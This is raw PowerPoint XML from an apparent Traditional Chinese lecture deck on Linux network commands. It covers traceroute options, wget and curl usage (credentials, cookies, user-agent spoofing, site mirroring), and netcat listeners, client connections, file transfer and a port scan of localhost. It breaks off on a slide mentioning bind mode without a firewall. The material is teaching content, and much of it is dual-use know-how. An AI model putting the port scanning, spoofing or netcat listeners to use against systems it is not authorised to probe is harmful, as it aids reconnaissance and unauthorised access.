              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>by pass.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>埠號：若不使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設埠號來偵測，可在此改變埠號。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>路由：與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的參數相仿，只是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後面接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>gateway IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。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2978280" y="679320"/>
              <a:ext cx="960480" cy="460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62440" y="615600"/>
                <a:ext cx="9921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038600" y="1560960"/>
              <a:ext cx="1613520" cy="658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22760" y="1497600"/>
                <a:ext cx="164520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108960" y="1554480"/>
              <a:ext cx="3618720" cy="137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93120" y="1491120"/>
                <a:ext cx="3650400" cy="264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66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路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>相關</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指令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99592" y="1719972"/>
            <a:ext cx="7488832" cy="3162796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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1196752"/>
            <a:ext cx="60917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從本地端到目地中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>間</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共經過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>個節點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5668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下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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下載檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 網路檔案路徑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定檔名  網路檔案路徑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>]  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/>
              <a:t>多檔案下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 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/>
              <a:t>續傳中途斷線檔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/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –ftp-user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  --ftp-password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> [options] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –mirror –p –convert-links –P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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砍站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)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530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硬體裝置在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中的檔名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="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95535" y="1268760"/>
            <a:ext cx="8599569" cy="4824536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957320" y="1771560"/>
              <a:ext cx="943560" cy="432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41480" y="1708200"/>
                <a:ext cx="97524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6207840" y="1857240"/>
              <a:ext cx="1000440" cy="432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192000" y="1793880"/>
                <a:ext cx="103212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6279480" y="2221560"/>
              <a:ext cx="1386000" cy="504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263640" y="2158200"/>
                <a:ext cx="1417680" cy="1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1514520" y="2250360"/>
              <a:ext cx="1829160" cy="78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498680" y="2186640"/>
                <a:ext cx="186084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6200640" y="2628720"/>
              <a:ext cx="371880" cy="147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184800" y="2565360"/>
                <a:ext cx="40356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1943280" y="2685960"/>
              <a:ext cx="95040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927080" y="2622600"/>
                <a:ext cx="9824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6236640" y="3064680"/>
              <a:ext cx="885960" cy="75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220440" y="3000960"/>
                <a:ext cx="91800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6958080" y="3443040"/>
              <a:ext cx="11448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942240" y="3379680"/>
                <a:ext cx="1461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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7022160" y="3757680"/>
              <a:ext cx="236160" cy="72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006320" y="3693960"/>
                <a:ext cx="2678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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2150280" y="3479040"/>
              <a:ext cx="450360" cy="360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134440" y="3415320"/>
                <a:ext cx="4820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5" name="筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2286000" y="4228920"/>
              <a:ext cx="779040" cy="291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270160" y="4165560"/>
                <a:ext cx="81072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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6850800" y="4122000"/>
              <a:ext cx="579240" cy="72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834960" y="4058280"/>
                <a:ext cx="6109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" name="筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6179400" y="4107600"/>
              <a:ext cx="964800" cy="75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163560" y="4044240"/>
                <a:ext cx="99648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8" name="筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6586560" y="4343400"/>
              <a:ext cx="886320" cy="2145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570720" y="4279680"/>
                <a:ext cx="918000" cy="34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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6286320" y="4736160"/>
              <a:ext cx="972000" cy="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270480" y="4672800"/>
                <a:ext cx="10036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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6329520" y="5136120"/>
              <a:ext cx="1000440" cy="363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13320" y="5072760"/>
                <a:ext cx="103248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1" name="筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1964520" y="5129280"/>
              <a:ext cx="793440" cy="572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948680" y="5065560"/>
                <a:ext cx="8251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2" name="筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2128680" y="5672160"/>
              <a:ext cx="786240" cy="572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112840" y="5608440"/>
                <a:ext cx="8179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3" name="筆跡 22"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7072200" y="5500440"/>
              <a:ext cx="164880" cy="75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056360" y="5437080"/>
                <a:ext cx="19656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4" name="筆跡 23"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7029360" y="5807880"/>
              <a:ext cx="336240" cy="36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7013520" y="5744160"/>
                <a:ext cx="3679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5" name="筆跡 24"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1227960" y="1965960"/>
              <a:ext cx="359640" cy="684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212120" y="1902600"/>
                <a:ext cx="3913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6" name="筆跡 25"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1162800" y="2057400"/>
              <a:ext cx="65520" cy="18324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146600" y="1994040"/>
                <a:ext cx="97560" cy="30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7" name="筆跡 26"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7968240" y="2390400"/>
              <a:ext cx="431640" cy="41832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7952400" y="2327040"/>
                <a:ext cx="463320" cy="54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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2109600" y="2913120"/>
              <a:ext cx="836640" cy="7200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093760" y="2849400"/>
                <a:ext cx="86832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29" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="496440" y="483480"/>
              <a:ext cx="1299960" cy="178992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80600" y="419760"/>
                <a:ext cx="1331640" cy="1917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4973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864" y="1338833"/>
            <a:ext cx="8229600" cy="5519167"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 網路路徑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> curl [options] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>瀏覽網頁測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>服務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 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/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>瀏覽網頁測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務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/>
              <a:t>瀏覽需要身分驗證的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>網頁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url –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–-user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>username:password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 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</a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>帶入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>curl –cookie “name=jack” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>偽冒瀏覽器瀏覽網頁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>curl –user-agent “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Mozila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/5.0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>compatible;MSIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 5.01;windows NT5.0)” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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437120" y="5584320"/>
              <a:ext cx="3233160" cy="853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20920" y="5520960"/>
                <a:ext cx="326520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68680" y="2161800"/>
              <a:ext cx="1306800" cy="918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52840" y="2098440"/>
                <a:ext cx="133848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972440" y="2273040"/>
              <a:ext cx="1280520" cy="52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56600" y="2209320"/>
                <a:ext cx="13122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521720" y="2782440"/>
              <a:ext cx="3475080" cy="39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505880" y="2718720"/>
                <a:ext cx="350676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743840" y="3161160"/>
              <a:ext cx="5134320" cy="85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728000" y="3097800"/>
                <a:ext cx="516600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018800" y="1560960"/>
              <a:ext cx="3266280" cy="658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02960" y="1497600"/>
                <a:ext cx="3297960" cy="19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481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186511"/>
          </a:xfrm>
        </p:spPr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/>
              <a:t>Server &amp;&amp;Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> –l [Local IP] port  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>本機轉監聽模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>;Server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> –l localhost 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  [IP] port  (Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 8080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>類似，連接本地端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port 25 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查閱相關訊息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1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/>
          <a:srcRect b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491743" y="4509120"/>
            <a:ext cx="4543050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99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474544"/>
          </a:xfrm>
        </p:spPr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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[options] [URL..]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-v:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示掃描訊息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-l:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定監聽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>外來的連線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>server mode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-p :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>監聽</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0"/>
              <a:t>root@www ~]# nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>–v –l -p localhost 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-z:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只有掃描，不進行資料傳輸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n:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查詢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>scan:nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –z –v –n 127.0.0.1 21-25 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>掃描本機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port21-port25)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案傳送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4"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>傳送端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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l [URL] [port] &lt; file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>接收端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>–n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[URL] [port] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>save_file_path</a:t>
            </a:r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057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661248"/>
          </a:xfrm>
        </p:spPr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Bind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沒有防火牆</a:t>
            </a:r>
            <a:r>
